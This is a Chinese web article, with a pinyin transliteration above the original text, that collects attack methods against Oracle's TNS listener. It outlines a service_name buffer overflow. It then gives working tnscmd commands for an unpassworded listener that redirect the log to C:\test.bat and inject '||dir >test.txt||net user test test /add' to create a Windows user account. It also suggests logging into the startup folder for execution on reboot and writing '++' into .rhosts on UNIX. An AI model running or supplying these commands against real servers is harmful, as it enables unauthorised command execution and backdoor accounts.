| 订阅 | 在线投稿
分享
 
 
 

针对Oracle的TNS listener攻击方法整理

2008-08-09 06:57:27 编辑來源:互联网 国际版 评论
 
 
本文为【针对Oracle的TNS listener攻击方法整理】的汉字拼音对照版显示拼音
  shouxiangenjubanbendebutongTNS listenerkenengjiaoyishoudaoduozhongleixingdehuanchongquyichugongjizhexiegongjikeyizaibutigongyonghuIDhekoulingdeqingkuangxiabeiliyongliruzaioracle 9izhongdangkehujiqingqiumougeguochangdeservice_nameshi,henrongyishoudaoyichugongjidanglistenerweirizhigoujiancuowuxiaoxizhihouservice_namedezhihuibeifuzhidaomouyuzhanjiegoudehuanchongquneicongeryinqiyichufugaibaocunzhijiangfanhuizhanzhongdedizhizhezhongzuofakeyi使shigongjizhehuodekongzhiquanshishishangTNS listenerzengjingyouguoduociyichuhegeshihuazifuchuandeloudong

  qicilingyileigongjiherizhiwenjianyouguanzhiyoudangweigeilistenershezhikoulingdeshihougongjicaihuiyouxiao

  jiashemougelistenermeiyoushezhikoulinggongjifangfaruxia

  tnscmd -h www.example.com -p 1521 rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\))) jiangrizhimulushezhidaoCpan

  tnscmd -h www.example.com -p 1521 rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat))) jiangrizhiwenjianshezhiweitest.bat

  tnscmd -h www.example.com rawcmd (CONNECT_DATA=(( ||dir >test.txt||net user test test /add))gaiminglingba

  dir >test.txtnet user test test /addminglingxieruc:\test.batwenjianyouyushuangshu线xiandezuoyongdiyitiaominglingzhixingshibaihouWINDOWSminglingjieshiqizhixinghoumiandeminglingbacuowudexinxizhushidiao congerkeyizhixingwomentijiaodemingling

  tongguoshezhirizhiwenjiandaobutongdemululiruWINDOWSdeqidongmuludangfuwuqichongqijiangzhixingeyiyonghutijiaodetedingdaimacongerduixitongzaochengweixie

  yunxingyuUNIXxitongshangdeoracleyehuishoudaotongyangdeweixieqizhongyizhongfangfajiushijiang++huisonggei.rhostwenjiandangxitongyunxingshi使shiyongr*servicesmingling原文
 
 
首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻击。当listener为日志构建错误消息之后,service_name的值会被复制到某于栈结构的缓冲区内,从而引起溢出—覆盖保存值将返回栈中的地址。这种做法可以使攻击者获得控制权。事实上,TNS listener曾经有过多次溢出和格式化字符串的漏洞。 其次,另一类攻击和日志文件有关。只有当未给listener设置口令的时候,攻击才会有效。 假设某个listener没有设置口令,攻击方法如下: tnscmd -h [url=http://www.example.com]www.example.com[/url] -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))” 将日志目录设置到C盘 tnscmd -h [url=http://www.example.com]www.example.com[/url] -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))” 将日志文件设置为test.bat tnscmd -h [url=http://www.example.com]www.example.com[/url] –rawcmd “(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))”该命令把 dir >test.txt、net user test test /add命令写入c:\test.bat文件,由于双竖线的作用(第一条命令执行失败后,WINDOWS命令解释器执行后面的命令)把错误的信息注释掉, 从而可以执行我们提交的命令。 通过设置日志文件到不同的目录,例如WINDOWS的启动目录,当服务器重启将执行恶意用户提交的特定代码,从而对系统造成威胁。 运行于UNIX系统上的oracle也会受到同样的威胁。其中一种方法就是将“++”回送给.rhost文件,当系统运行时,使用r*services命令。
󰈣󰈤
 
 
>>返回首页<<
 为你推荐
 
 
 
 转载本文
 UBB代码 HTML代码
复制到剪贴板...
 
 
 热帖排行
 
 
王朝网络微信公众号
微信扫码关注本站公众号wangchaonetcn
 
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
©2005- 王朝网络 版权所有